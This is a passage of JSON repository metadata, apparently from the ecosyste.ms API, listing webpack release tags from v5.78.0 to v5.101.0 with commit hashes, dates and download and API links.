:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/